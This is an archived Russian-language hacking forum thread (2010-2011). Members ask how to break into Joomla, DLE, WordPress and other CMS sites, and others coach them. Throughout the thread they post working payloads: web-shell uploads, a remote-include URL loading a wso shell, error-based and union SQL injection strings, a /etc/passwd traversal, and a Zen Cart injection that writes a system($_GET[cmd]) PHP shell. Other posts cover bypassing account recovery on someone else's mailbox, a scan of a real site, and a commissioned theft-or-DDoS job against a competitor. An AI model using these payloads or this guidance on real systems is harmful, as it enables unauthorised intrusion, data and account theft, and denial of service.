Просмотр полной версии : [Задай Вопрос - Получи Ответ]
CyberHunter
01.07.2010, 12:37
в админке джумлы, можно редактировать robots.txt?
Насколько знаю, то нельзя.
А что мешает залить шелл и через него редактировать файлы?
он залит, нету прав на редактирование.
Доброго.
У меня чудеса творятся с присутствием файла.
Есть бажный скрипт, который позволяет читать файлы (путь относительно себя)
через него я нашел конфиг с данными конекта к бд, в ней нашел такие данные:
Mp3LocalPathName: d:\oniogo-www\precedent\
PublicPathName: http://podcast.oniogo.com/precedent/
и еще строчку с xml'кой, которая лежит в этой директории и видна из веба.
тоесть чтобы прочитать файл в //podcast.oniogo.com/precedent/some.php
нужно писать его в d:\oniogo-www\precedent\some.php
но: писаться то он пишется, а вот IIS выдает 404ю при попытке его запросить.
*при том что все остальные файлы отдаются нормально.
в чем соль?
Подскажите как можно дле защитить от ПМ спама? в частности от dle spammer
[Feldmarschall]
25.07.2010, 14:45
Подскажите как можно дле защитить от ПМ спама? в частности от dle spammer
http://my-dle.ru/1058-anti-spam-pm.html
Народ помогите раскрутить SQL - как вытянуть пароль админа? CMS Joomla - версию не знаю.
[Feldmarschall]
06.08.2010, 17:42
Народ помогите раскрутить SQL - как вытянуть пароль админа? CMS
Joomla
- версию не знаю.
http://tami-tours.ru/index.php?option=com_phocagallery&view=categories&Itemid=[SQL Injection]
тебе сюда /threadedpost2286345.html, и врятли кто тебе поможет ломать чтото за тебя.
ребята вот сайт http://a-sn.ru движок social engine 3.18 есть там баги если есть напишите c меня репка) и угошю веб мани если баги работают) можете писать тут или в icq 578312137
"халявы не будет", нече, нече школа скора начнется можете долго тут не задерживаться.
[Feldmarschall] - "причем тут ломать что то за меня" - если ты мне это написал... я просил помочь раскрутить sql-inj
Чего то я не пойму - решил что ли утвердиться за счет людей которые просят помощи? тема называется задай "вопрос- получи ответ" - если у тебя нет конкретного вопроса или ответа на вопросы которые задают, чего тему то засорять?
На счет каникул - вообще смешно - у меня уже внук есть - поздно мне в школу.
chaby - полазий на BT разных и погугли, посети места на подобии милворма - если он в ауте то инджектион КОМ.
[Feldmarschall]
07.08.2010, 15:38
[Feldmarschall]
- "причем тут ломать что то за меня" - если ты мне это написал... я просил помочь раскрутить sql-inj
Чего то я не пойму - решил что ли утвердиться за счет людей которые просят помощи? тема называется задай "вопрос- получи ответ" - если у тебя нет конкретного вопроса или ответа на вопросы которые задают, чего тему то засорять?
На счет каникул - вообще смешно - у меня уже внук есть - поздно мне в школу.
chaby - полазий на BT разных и погугли, посети места на подобии милворма - если он в ауте то инджектион КОМ.
1. Задай вопрос - получи ответ а не дай линк - получи взлом
для этого есть другая тема для таких вопросов, я тебе линк уже давал в предыдущем посте.
2. Про школу я не тебе писал, можешь посмотреть кого я цитировал.
он залит, нету прав на редактирование.
если через шелл нельзя, то через джумлу тоже не получится.
for Platon
идешь сюда и качаешь CMS Explorer __http://raz0r.name/obzory/cms-explorer/, потом запускаешь на свой сайт и смотришь какие плагины установлены, потом идешь на inj3ct0r.com и проходишься по плагинам.
версию можно попробовать узнать /includes/version.php
mr.celt - спасибо! мега удобная тузла! раньше делал это в ручную, теперь проверка наличие плагинов - дело 2 минут, очень мне понравилась!
[Feldmarschall] - ок, ухожу в другой топик.
Приветствую, уважаемые форумчане.
Извините за идиотский вопрос, но как залить шелл в joomla v.1.5, если нет ни JoomlaXplorer, ни меню редактирования языков, при заливке в папку с картинками (media), пишет, что не правильное изображение (пробовал и 123.php и 123.php.jpg и 123.png), плюс к этому глобальный админ отключен, у меня аккаунт админа...
Кстати пишет, что запись в папку с картинками разрешена, но какой-то зловредный скрипт этому мешает.
Помогите, оч надо, а то решил шелами заняться (для общего развития), а тут такая засада...
Если папка modules вритабельна, ставим новый модуль.
Архив по ссылке.
Шелл : wso.
zalil.ru/upload/29460413
Вот чёрт, файл удалён. Завтра перезалью.
Посмотри права в templates. Не одним JoomlaXplorer'ом залитие обходится, смотри ещё модули.
x.Mr.Bob.x
30.08.2010, 21:31
А вот допустим сейчас вышла новая версия vBulletin 4.0 Publishing Suite что входит в неё?если я приобрету смогу ли я пользоватся первое время стабильной 3.8.6 а после перейти без проблем на 4?
Есть сайты на osCommerce (версия 2003г), пытался вставить в индекс и футер что-либо, никакой реакции, на странице это не отражается почему-то. Очищение файла или нарушение целостности кода сразу отражается на странице. Почему так может быть?
4images
Сегодня покопался на inj3ct0r.com и меня заинтересовал этот пост link (http://inj3ct0r.com/exploits/13782)
Решил потестить на локальной машине. Скачал CMSку (1.7.8) с официального сайта, развернул и настроил как в мане написано.
Попробовал заюзать описанную уязвимость так
http://4images.local/global.php?db_servertype=http://shell.local/wso.txt%00
4images.local и shell.local - локальные домены.
Кроме надписи "Security violation" ничего не увидел.
Кто-нибудь тестил у себя? После просмотра исходника сложилось впечатление, что глобальный инъект невозможен, но может че-то сам не доганяю.
x.Mr.Bob.x
13.09.2010, 00:53
Всем привет. На одном сайте захотел приобрести шаблон, но у меня появился вопрос снизу перед выбором шаблона написано Type: CSS Full Site Flash 8 или CSS Static Full Site или ещё что либо,что это означает,я знаю что Type это вид, но вот что после не знаю, если ли Flash шаблон, для установки как система управления,например приобрел,установил и через него управлять? Дальше, аот шаблон,когда я смотрю все на Английском, смогу ли я изменить без проблем это на другие слова? Заранее спасибо
Всем привет. На одном сайте захотел приобрести шаблон, но у меня появился вопрос снизу перед выбором шаблона написано Type: CSS Full Site Flash 8 или CSS Static Full Site или ещё что либо,что это означает,я знаю что Type это вид, но вот что после не знаю, если ли Flash шаблон, для установки как система управления,например приобрел,установил и через него управлять? Дальше, аот шаблон,когда я смотрю все на Английском, смогу ли я изменить без проблем это на другие слова? Заранее спасибо
Вообще вопрос не совсем по тематике...
Но рискну предположить, что где Flash-шаблон там настройки отображения зашиты в самом flash-файле или в xml-ки, а где CSS Static, то настройки не изменяемы либо в стандартном файле с расширением css. По-поводу языка - если ты покупаешь шаблон, то делай с ним что хошешь - разбирайся в исходниках.
x.Mr.Bob.x
13.09.2010, 18:56
а разбиратся тяжело?
а разбиратся тяжело?
Поставь пока бесплатный шаб, покрути там что по чем, если совсем в тягость будет. Обезопасишь себя от необдуманной траты средств.
DimOnOID
14.09.2010, 17:05
Сегодня покопался на inj3ct0r.com и меня заинтересовал этот пост
link (http://inj3ct0r.com/exploits/13782)
Решил потестить на локальной машине. Скачал CMSку (1.7.8) с официального сайта, развернул и настроил как в мане написано.
Попробовал заюзать описанную уязвимость так
http://4images.local/global.php?db_servertype=http://shell.local/wso.txt%00
4images.local и shell.local - локальные домены.
Кроме надписи "Security violation" ничего не увидел.
Кто-нибудь тестил у себя? После просмотра исходника сложилось впечатление, что глобальный инъект невозможен, но может че-то сам не доганяю.
В самом начале
if (!defined('ROOT_PATH')) {
die("Security violation");
}
Константа не определена это раз
81 $db_servertype="mysql";
384include_once(ROOT_PATH.'includes/db_'.strtolower($db_servertype).'.php');
Переменная $db_servertype определена ..никаких инжектов нету.
а иньектор это команда плагиаторов-дебилойдов которые любят подобное гавно постить чтобы свой говно сайт в гугле поднять
Подскажите как имея на руках данные php.ini, возможность свюодно передвигаться по директориям сайта и используя уязвимость FCEditor или tiny_mce завладеть данными сайта
Подскажите как имея на руках данные php.ini, возможность свюодно передвигаться по директориям сайта и используя уязвимость FCEditor или tiny_mce завладеть данными сайта
Если есть доступ до FCEditor, то можешь залить файл в директорию site.com/upload (стандартно), но накладываются ограничения на разрешение, так что заливай текстовик с шеллом и попробуй найти LFI.
Про возможность свободно передвигаться не совсем понял. Поясни.
Если есть доступ до FCEditor, то можешь залить файл в директорию site.com/upload (стандартно), но накладываются ограничения на разрешение, так что заливай текстовик с шеллом и попробуй найти LFI.
Про возможность свободно передвигаться не совсем понял. Поясни.
То есть есть какая то директоря например систем а в ней мноого чего. И по ней как по фтп нику можно ходить Но файлы пх соответвественно не посмотришь а во структуру узнать можно
PS есть ли какая нибудь уязвимость у tiny_mce насколько я понял они отказались от ФЦКЕдитора
PSPS По ходу форум журнала компьютерных хулиганов поломали висит 403 ошибка
То есть есть какая то директоря например систем а в ней мноого чего. И по ней как по фтп нику можно ходить Но файлы пх соответвественно не посмотришь а во структуру узнать можно
PS есть ли какая нибудь уязвимость у tiny_mce насколько я понял они отказались от ФЦКЕдитора
Можно ходить браузером? Это похоже просто проиндексированная директория (более интересного объяснения еще не встречал)) ). Это тебе для fckeditor __http://inj3ct0r.com/exploits/9708, а это для tiny_mce __http://inj3ct0r.com/exploits/12282.
DLE 8.5
site.ru/engine/modules/imagepreview.php?image=javajavascriptscript:docume nt.write(String.fromCharCode(закоденный, html,код))
подскажите что можно сделать с сайтом, имея это?
JohnnyBGoode
27.11.2010, 13:24
DLE 8.2
При переходе по разделам каждый раз требует авторизоваться.Я так понимаю надо отключить контроль изменения IP в настройках скрипта,но как это можно сделать если при нажатии на кнопку "Сохранить" вновь требует авторизацию ?
DLE 8.2
При переходе по разделам каждый раз требует авторизоваться.Я так понимаю надо отключить контроль изменения IP в настройках скрипта,но как это можно сделать если при нажатии на кнопку "Сохранить" вновь требует авторизацию ?
А что у тебя ip динамически меняется без переподключения? Попробуй в конфиг или в базу данных внести нужные параметры напрямую.
здрасте всем. есть сайт, база данных - oracl, на сайте скрипт, показывающий поверх загруженной страницы карточку и данными пользователя, команда javascript:getdivlayerimgprofile(id). getdivlayerimgprofile(5) дает такой же результат как getdivlayerimgprofile(2+3). как еще можно проверить наличие sql уязвимости?
Всем доброго времени!
Научите люди добрые. Имею dbconfig. Нужно узнать путь на сервере.
sit.ru/phpmyadmin/ и sit.ru/myadmin/ не проканывает я знаю есть и другие варианты (не будишь же руками все перебирать). Может соф какой есть, или еще что-то чтобы узнать путь?
Привет Всем. есть ли возможность, имея доступ к админке, залить шелл в дле 8,2?
Подскажите пожалуйста, где можно почитать/посмотреть о юзании LFI на FreeBSD? Так как вариант с /proc/self/environ тут не прокатывает.
CyberRat
18.12.2010, 02:01
Подскажите пожалуйста, где можно почитать/посмотреть о юзании LFI на FreeBSD? Так как вариант с /proc/self/environ тут не прокатывает.
во фряхе есть такая особенность, диры можно читать как афйлы
во фряхе есть такая особенность, диры можно читать как афйлы
Не подскажешь как? Я поискал по этой теме, но ничего не нашел. Прошу участников форума подсказать, существуют ли еще какие-то варианты применения LFI во FreeBSD и что из этого можно получить, чисто спортивный интерес. Я решил посмотреть по путям указанными в этой теме (https://antichat.live/threads/49775/), но так как столько вручную не переберешь, применил сканер LFI by GlaDiaT0R (http://pastie.org/pastes/941825/), но это также не дало результата, посмотрев код увидел, что "Vulnerable" срабатывает только если в ответе содержиться /root:x/ то бишь при чтении файла /etc/passwd, но ведь строки root:x в логах не бывает, посмотрев содержимое своих разных логов, добавил еще в код сканера строки /time/, /GET/, /error/ и еще пришлось добавить нулл-байт ко всем путям, так как у меня отображается только с ним. К сожалению и это тоже не помогло, уж не знаю, тут либо пути не подошли, либо доступа нет. Вариантов уже не осталось... Хелп!
Я все еще продолжаю мурыжить этот сайтец. Есть вопрос. )
Файлы нормально читаются, ссылка в виде - http://site.com/?xx=../../../../../../../etc/passwd
При попытке чтения листинга директории - http://site.com/?xx=../../../../../../../etc/ вываливается вот такая муть -- ������ЂењШ������� ����
/var/log/ - ������Ђ»ЎьF
/tmp/ - ������Ђo¤ьF������� ���������������� ���������������� �����������x����@ �����eaccelerator������� ���������������� ��������������Ђ� ���@������passenger.1074�� ���������������� ���������������� Ђ����@������passenger.1177 ���������������� ���������������� ��Ђ����@������passenge r.41534�������������� ���������������� ����Ђ����@������pas senger.41536������������ ���������������� �����Ђ����@����� passenger.41546����������� ���������������� �������Ђ����@��� ��passenger.41548��������� ���������������� ���������Ђ����@�� ����passenger.41560������� ���������������� ����������Ђ����@ �����passenger.41562������ ���������������� ������������й‚�� �@������passenger.36286��� ���������������� ��������������v‚ ���@������passenger.30625� ���������������� ���������������� –‚����@������passenger.31 126��������������� ���������������� ��„‚����@������pass enger.306
Что это такое? Что еще можно вытятнуть из локального инклуда в БСД ?
pumpnpose
31.12.2010, 12:30
Доброго времени суток. Всех с наступающим!
Подскажите, пожалуйста, как залить шел на PHP-Nuke, имея доступ к админ. панели?!
Благодарю.
CyberRat
31.12.2010, 13:13
Chest3r залей картинку с пхп кодом, её и инклюдь
Совершенно Секретн
02.01.2011, 21:19
Здравствуйте. Меня интересует такой вопрос. Как можно просканировать сайт на порт MySQL или на саму PhpMyAdmin как найти? ибо стандартные
Myadmin
myphpadmin
phpmyadmin
не работает ! Заранее спасибо!
Как можно просканировать сайт на порт MySQL
Кэпую: сканером портов. Только не сайт сканируют, а сервер.
Совершенно Секретн
02.01.2011, 22:45
Кэпую: сканером портов. Только не сайт сканируют, а сервер.
А точнее можете сказать какая лучше программа?
нмэп
для тя лучш zenmap
http://nmap.org/zenmap/
Я все еще продолжаю мурыжить этот сайтец. Есть вопрос. )
Файлы нормально читаются, ссылка в виде - http://site.com/?xx=../../../../../../../etc/passwd
При попытке чтения листинга директории - http://site.com/?xx=../../../../../../../etc/ вываливается вот такая муть -- ������ЂењШ������� ����
/var/log/ - ������Ђ»ЎьF
/tmp/ - ������Ђo¤ьF������� ���������������� ���������������� �����������x����@ �����eaccelerator������� ���������������� ��������������Ђ� ���@������passenger.1074�� ���������������� ���������������� Ђ����@������passenger.1177 ���������������� ���������������� ��Ђ����@������passenge r.41534�������������� ���������������� ����Ђ����@������pas senger.41536������������ ���������������� �����Ђ����@����� passenger.41546����������� ���������������� �������Ђ����@��� ��passenger.41548��������� ���������������� ���������Ђ����@�� ����passenger.41560������� ���������������� ����������Ђ����@ �����passenger.41562������ ���������������� ������������й‚�� �@������passenger.36286��� ���������������� ��������������v‚ ���@������passenger.30625� ���������������� ���������������� –‚����@������passenger.31 126��������������� ���������������� ��„‚����@������pass enger.306
Что это такое? Что еще можно вытятнуть из локального инклуда в БСД ?
кривая кодировка
Есть ли способы обойти защиту в wordpress 3.0.4 или phpbb 3.0.8?
webdizign
03.02.2011, 12:30
Нид хелп
Здравствуйте!
У нас был сайт на системе управления Wordpress, мы перенесли его на систему управления Joomla, при этом изменив структуру для отображения страниц.
Проблема в следующем:
Ссылки, которые были на старом сайте, открываются на новом, но страницы отображают не те, что нужно.
Примеры:
1. ссылка со старого сайта вида http://lodg.ru/photo/prov_f/prov_f_1.html открывает на новом сайте главную страницу
2. ссылка со старого сайта вида http://lodg.ru/photo/prov_f/prov_f_3.html открывает станицу http://lodg.ru/photo.html
Страницы prov_f_1.html и prov_f_3.html существуют, но открываются по ссылке вида http://lodg.ru/prov_f_1.html и http://lodg.ru/prov_f_3.html
Как это поправить? И с чем такое отображение может быть связано?
webdizign
03.02.2011, 14:46
Здравствуйте!
У нас был сайт на системе управления Wordpress, мы перенесли его на систему управления Joomla, при этом изменив структуру для отображения страниц.
Проблема в следующем:
Ссылки, которые были на старом сайте, открываются на новом, но страницы отображают не те, что нужно.
Примеры:
1. ссылка со старого сайта вида http://lodg.ru/photo/prov_f/prov_f_1.html открывает на новом сайте главную страницу
2. ссылка со старого сайта вида http://lodg.ru/photo/prov_f/prov_f_3.html открывает станицу http://lodg.ru/photo.html
Страницы prov_f_1.html и prov_f_3.html существуют, но открываются по ссылке вида http://lodg.ru/prov_f_1.html и http://lodg.ru/prov_f_3.html
Как это поправить? И с чем такое отображение может быть связано?
Проблема решена.
Доброго.
Есть сайт на code integer,
и есть бажный скрипт, который позволяет читать файлы.
При условии, что конектиться к базе с внешних хостов нельзя (пробовал)
куда копать дальше?
Добрый вечер.
Возможно глупый вопрос, но все же спрошу. У меня есть один сайт, про который я впрочем уже забыл как полгода. Я заметил, что сейчас гугл блокирует его, пишет что: "Имеется информация, что эта веб-страница атакует компьютеры!", хотя я лично ничего вредоносного туда не заливал. Сегодня зашел в файловый менеджер и увидел, что почти в каждой папке появился "index.htm", со следующим содержанием:
http://img291.imageshack.us/img291/2396/wtfopk.png
Скажите, что это за скрипт и как злоумышленник смог загрузить его на хостинг? Сайт не особо защищен, т.к. я взял уже готовый исходник и почти не редактировал его. Хотя бы в пару словах объясните, просто интересно.
Всем добрый день. Народ, подскажите, как можно залить файл на сервер в папку с правами 777?
Всем добрый день. Народ, подскажите, как можно залить файл на сервер в папку с правами 777?
Залить можно по протоколу FTP с помощью FTP-клиента. Затем выставить права. В FileZilla делается нажатием правой кнопки мыши на нужном файле - права доступа - выставишь 777.
P.S. man google
Залить можно по протоколу FTP с помощью FTP-клиента. Затем выставить права. В FileZilla делается нажатием правой кнопки мыши на нужном файле - права доступа - выставишь 777.
P.S. man google
Не, не, не значит я не правильно задал вопрос. Как атакующий может залить файл в папку с правами 777, не имея при этом логина с паролем?
Подскажите есть ли возможность в wordpress 3.* возможность вставить php код где либо в бд, так чтоб он выполнялся на сайте?
Без использования плагинов (типа inline-php и exec-php).
P.S. Вопрос интересует так как на сайте нет ни одного файла или папки с правами на запись.
Zeratull
05.03.2011, 16:53
какие есть уязвимости для word press 2.8.6?
WhiteDevil
14.03.2011, 15:37
Как можно залить шелл на Wordpress 3.1? Доступ в админку есть но только к Posts и Media. Доступ под админом.
Grandman
29.03.2011, 15:26
Есть полный доступ к админке dle, как можно слить сайт?
озаботился я одним сайтом. на одном айпи с ним висит еще один с самомписным движком и на нем загрузка картинок режется, кавычки и теги фильтруются.
просканил нмапом. скажу честно так много всего не видел.
показало что порт с мускулом открыт, попробовал зайти по адресу сайт:3306, скачался небольшой файл .PART открыл его хекс редактором и блокнотом , запись - (немного кракозябр и в конце) Bad handshake. пробовал по фтп и ссл подключаться. ручками сбрутить не получилось.
в отчете нмапа какие то мд5 и соль.
можно какую пользу взять с этого отчета?
Starting Nmap 5.51 ( http://nmap.org ) at 2011-04-01 20:12 Московское время (лето)
NSE: Loaded 57 scripts for scanning.
Initiating Ping Scan at 20:12
Scanning сайт [4 ports]
Completed Ping Scan at 20:12, 0.57s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:12
Completed Parallel DNS resolution of 1 host. at 20:12, 0.21s elapsed
Initiating SYN Stealth Scan at 20:12
Scanning сайт.ru (сайт) [1000 ports]
Discovered open port 110/tcp on сайт
Discovered open port 22/tcp on сайт
Discovered open port 995/tcp on сайт
Discovered open port 80/tcp on сайт
Discovered open port 143/tcp on сайт
Discovered open port 3306/tcp on сайт
Discovered open port 993/tcp on сайт
Discovered open port 21/tcp on сайт
Discovered open port 53/tcp on сайт
Discovered open port 587/tcp on сайт
Discovered open port 25/tcp on сайт
Discovered open port 106/tcp on сайт
Discovered open port 443/tcp on сайт
Discovered open port 465/tcp on сайт
Discovered open port 8443/tcp on сайт
Completed SYN Stealth Scan at 20:12, 4.49s elapsed (1000 total ports)
Initiating Service scan at 20:12
Scanning 15 services on ********.ru (сайт)
Completed Service scan at 20:13, 32.29s elapsed (15 services on 1 host)
Initiating OS detection (try #1) against *****.ru (сайт)
Initiating Traceroute at 20:13
Completed Traceroute at 20:13, 0.01s elapsed
Initiating Parallel DNS resolution of 8 hosts. at 20:13
Completed Parallel DNS resolution of 8 hosts. at 20:13, 0.75s elapsed
NSE: Script scanning сайт.
Initiating NSE at 20:13
Completed NSE at 20:13, 4.17s elapsed
Nmap scan report for сайт.ru (сайт)
Host is up (0.0099s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 1024 fe:94:b8:91:f3:51:a3:5e:ea:99:83:c0:2a:93:0c:a6 (DSA)
|_2048 93:a1:d5:be:0d:65:41:9c:ee:6d:84:bf:7c:59:a3:a9 (RSA)
25/tcp open smtp qmail smtpd
| smtp-commands: сайт.ru, AUTH=LOGIN CRAM-MD5 PLAIN, AUTH LOGIN CRAM-MD5 PLAIN, PIPELINING, 8BITMIME
|_ qmail home page: http://pobox.com/~djb/qmail.html
53/tcp open domain ISC BIND 9.3.4-P1
80/tcp open http Apache httpd 2.2.3 ((CentOS))
| http-robots.txt: 12 disallowed entries
| /admin/ /site/ /search/ /oldchat/enter.php
| /member/new.php /member/forgot.php /agency/write_letter.php
|_/member.php /add.php /info.php /edit.php /search.php
|_http-title: \xD1\xE0\xE9\xF2 \xE4\xEB\xFF \xE8\xED\xE2\xE0\xEB\xE8\xE4\xEE\xE2 - сайт.ru - \xEF\xE5\xF0\xE2\xFB\xE9 \xF0\xEE\xF1\xF1\xE8\xE9\xF1\xEA\xE8\xE9 \xE8\xED\xF2\xE5\xF0\xED\xE5...
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-favicon: Unknown favicon MD5: 17D3795B85F0A4883DCDDD68133A5935
106/tcp open pop3pw poppassd
110/tcp open pop3 Courier pop3d
|_pop3-capabilities: USER LOGIN-DELAY(10) IMPLEMENTATION(Courier Mail Server) UIDL PIPELINING APOP TOP OK(K Here s what I can do)
143/tcp open imap Courier Imapd (released 2004)
|_imap-capabilities: THREAD=ORDEREDSUBJECT QUOTA THREAD=REFERENCES UIDPLUS ACL2=UNION SORT ACL IMAP4rev1 IDLE NAMESPACE CHILDREN
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
|_http-methods: GET HEAD POST OPTIONS
|_http-title: www.сайт.ru
|_sslv2: server still supports SSLv2
465/tcp open ssl/smtp qmail smtpd
|_sslv2: server still supports SSLv2
| smtp-commands: сайт.ru, AUTH=LOGIN CRAM-MD5 PLAIN, AUTH LOGIN CRAM-MD5 PLAIN, PIPELINING, 8BITMIME
|_ qmail home page: http://pobox.com/~djb/qmail.html
587/tcp open smtp qmail smtpd
| smtp-commands: сайт.ru, AUTH=LOGIN CRAM-MD5 PLAIN, AUTH LOGIN CRAM-MD5 PLAIN, STARTTLS, PIPELINING, 8BITMIME
|_ qmail home page: http://pobox.com/~djb/qmail.html
993/tcp open ssl/imap Courier Imapd (released 2004)
|_imap-capabilities: THREAD=ORDEREDSUBJECT QUOTA AUTH=PLAIN THREAD=REFERENCES UIDPLUS ACL2=UNION SORT ACL IMAP4rev1 IDLE NAMESPACE CHILDREN
|_sslv2: server still supports SSLv2
995/tcp open ssl/pop3 Courier pop3d
|_sslv2: server still supports SSLv2
|_pop3-capabilities: USER LOGIN-DELAY(10) IMPLEMENTATION(Courier Mail Server) UIDL PIPELINING APOP TOP OK(K Here s what I can do)
1720/tcp filtered H.323/Q.931
3306/tcp open mysql MySQL 5.0.22
| mysql-info: Protocol: 10
| Version: 5.0.22
| Thread ID: 458874
| Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection
| Status: Autocommit
|_Salt: ?>Wy!2v"?WvpMog6uoKi
8443/tcp open ssl/http sw-cp-server httpd (Parallels Plesk WebAdmin version)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
|_http-favicon: Parallels Plesk Panel
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.30
Uptime guess: 6.953 days (since Fri Mar 25 20:20:36 2011)
Network Distance: 8 hops
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: localhost.localdomain; OS: Unix
ах да, нашел где пхпмайадмин у хостера, но там сразу окно авторизации. руками тоже не подобрал.
cms netcat
Кто-нибудь сталкивался с cms netcat? Какие впечатления по безопасности? У меня попалась версия 2.4 Standart. Может у кого есть исходники или супер-сплоиты?))
vitalik_9000
02.04.2011, 12:37
Ну судя по отзывам и моему мнению - норм движок))).
Ну судя по отзывам и моему мнению - норм движок))).
2.4 старая версия по сравнению с текущей 4.2 - может уже какие баги проявились...
Langolier
04.04.2011, 00:39
Прошу прощения если повторяю вопрос, ответ на который уже был. Хотелось бы выяснить как мне считать файл configuration.php с сайта на Joomla! ???
Прошу прощения если повторяю вопрос, ответ на который уже был. Хотелось бы выяснить как мне считать файл configuration.php с сайта на Joomla! ???
readfile('configuration.php');
Kn[1]Fe^^
14.05.2011, 18:03
Здравствуйте, короче я сегодня лазил в гугле и искал уязвимости. Забрел на один сайт добавил в конце кавычку, чтобы проверить его на скл инекшн. И мне выпадает типа мой ип и написано: твои действия были записаны в такой то департамент чего то там соединенных штатов. Внимание знатоки вопрос: это типа прикол, или мне реал копов с пушкой ждать xD
Fe^^"]
Kn[1]Fe^^ said:
Здравствуйте, короче я сегодня лазил в гугле и искал уязвимости. Забрел на один сайт добавил в конце кавычку, чтобы проверить его на скл инекшн. И мне выпадает типа мой ип и написано: твои действия были записаны в такой то департамент чего то там соединенных штатов. Внимание знатоки вопрос: это типа прикол, или мне реал копов с пушкой ждать xD
Подставив кавычку ты закон не нарушал, так что врятли
Kn[1]Fe^^
14.05.2011, 18:34
Ок. А если пароли из саита вытащил и зашел через админку?
Нужно восстановить пасс и обойти проверку на 4game.ru
восставливаем пасс на ящик enegeor2@ya.ru, требует подтверждение на мобил. телефон или доп почту - возможно ли как-то обойти подтверждение? раньше можно было менять код запроса, т.к. не было проверки.. http://www.youtube.com/watch?v=oHb_FcDzAYY&feature=player_embedded
seofilms
30.05.2011, 21:48
Ввожу при входе в админку галочку в логин и пароль, вылетает :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/html/richardnedved/www/tridy/Admini.class.php on line 26
Где почитать про скули в полях логина и пароля а не в браузере ?
Ввожу при входе в админку галочку в логин и пароль, вылетает :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/html/richardnedved/www/tridy/Admini.class.php on line 26
Где почитать про скули в полях логина и пароля а не в браузере ?
Скули как скули. live http headers, чтобы удобнее, и крути.
Есть сайт с sql инъекцией, в авторизации. Поля login и password. На запись и чтение прав нету, вывести информацию не получается. Известно название базы данных, логин на вход в базу, таблица с пользователями, количество и названия колонок.
Что ещё можно сделать с этим всем?
Использую конструкцию:
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(
DATABASE()
, 1, 63), FLOOR(RAND(0)*2))) --
В ошибке на странице выдаёт название базы данных.
Пытаюсь применить эту конструкцию для другого запроса:
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(
SELECT user_1 FROM users
, 1, 63), FLOOR(RAND(0)*2))) --
Выдаёт ошибку, но команду не выполняет:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT user_1 FROM users, 1, 63), FLOOR(RAND(0)*2))) -- '' at line 1
В итоге возникает вопрос. Как заставить выполниться команду
SELECT user_1 FROM users
Название столбца и таблицы точно эти.
Подскажите пожалуйста, почему у меня при попытке узнать параметры file_priv
выдает только ошибки. К примеру такую:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/www/data-dist/n*co*sult*ng.**/publications.php on line 7
пробовал на разных сайтах, везде или ошибки, или пустая страница
делаю так:
сначала узнаю имя пользвателя
test.php?id=-1+union+select+1,user(),3--
допустим root
затем пытаюсь узнать праметры file_priv для этого пользователя
test.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where +user='root'--
Подскажите пожалуйста, почему у меня при попытке узнать параметры file_priv
выдает только ошибки. К примеру такую:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/www/data-dist/n*co*sult*ng.**/publications.php on line 7
пробовал на разных сайтах, везде или ошибки, или пустая страница
делаю так:
сначала узнаю имя пользвателя
test.php?id=-1+union+select+1,user(),3--
допустим root
затем пытаюсь узнать праметры file_priv для этого пользователя
test.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where +user='root'--
нет доступа к базе mysql
Подскажите какой движок используется сайтом cwars.ru.
П.С.
сорри если не в той теме вопрос задал, не как не мог найти подходящую тему.
Подскажите какой движок используется сайтом cwars.ru.
П.С.
сорри если не в той теме вопрос задал, не как не мог найти подходящую тему.
WordPress
WordPress
С чего ты взял что он на ВП? Не каких признаков вп там не нашел
war.driver
29.07.2011, 10:09
Мужики, в общем дело такое: пришёл заказ. Сабж не указываю по понятным причинам. Задача-достать движок, который разумеется конкурент конкуренту не продаст. Коммерсанты херовы, млин. Если не получится достать движ-то ДДоС. Ну ладно, полез просто посмотреть, хоть и не совсем мой профиль, но расти-то надо всегда. С БТ дружу понемногу, но начал с SSS на винде. Он мне дал следующее:
1 CGI Scripts : Zen Cart Multiple File Include Vulnerabilities
Порт 80
Описание Zen Cart is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input.An attacker can exploit these issues to include arbitrary remote and local files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.These issues affect version 1.3.0.2 and prior; other versions may also be vulnerable.
Как исправить Upgrading to the most recent version of Zen Cart.
Уровень риска Высокий
Ссылки Zen Cart Homepage
Скрипт http://subj.ru/index.php?
CVE CVE-MAP-NOMATCH
Bugtraq ID 19543
.............
2 Mail Servers : SMTP without AuthLogin
Порт 2500
Описание An SMTP service supports SMTP without AuthLogin.
Как исправить Install authlogin.
Уровень риска Низкий
.............
3 Web Servers : The list of E-Mail
Порт 80
Описание Found E-Mail on web site
Уровень риска Информационный
E-Mail //mail@subj.ru/
CVE GENERIC-MAP-NOMATCH
............
Всё в степени от высокого до низкого. Ну, думаю, делать нечего-полез в сеть по "красному коду", хоть и понимаю, что "боян". Ачат курил и курю, вот тут (https://antichat.live/threads/19997/) по вопросу о Zen Cart нашел у г-на DIAgen'а следующее:
1
admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2C%27%3C%3Fphp+s ystem%28%24_GET%5Bcmd%5D%29%3B+%3F%3E%27%2C0
, на что сабж ответил:
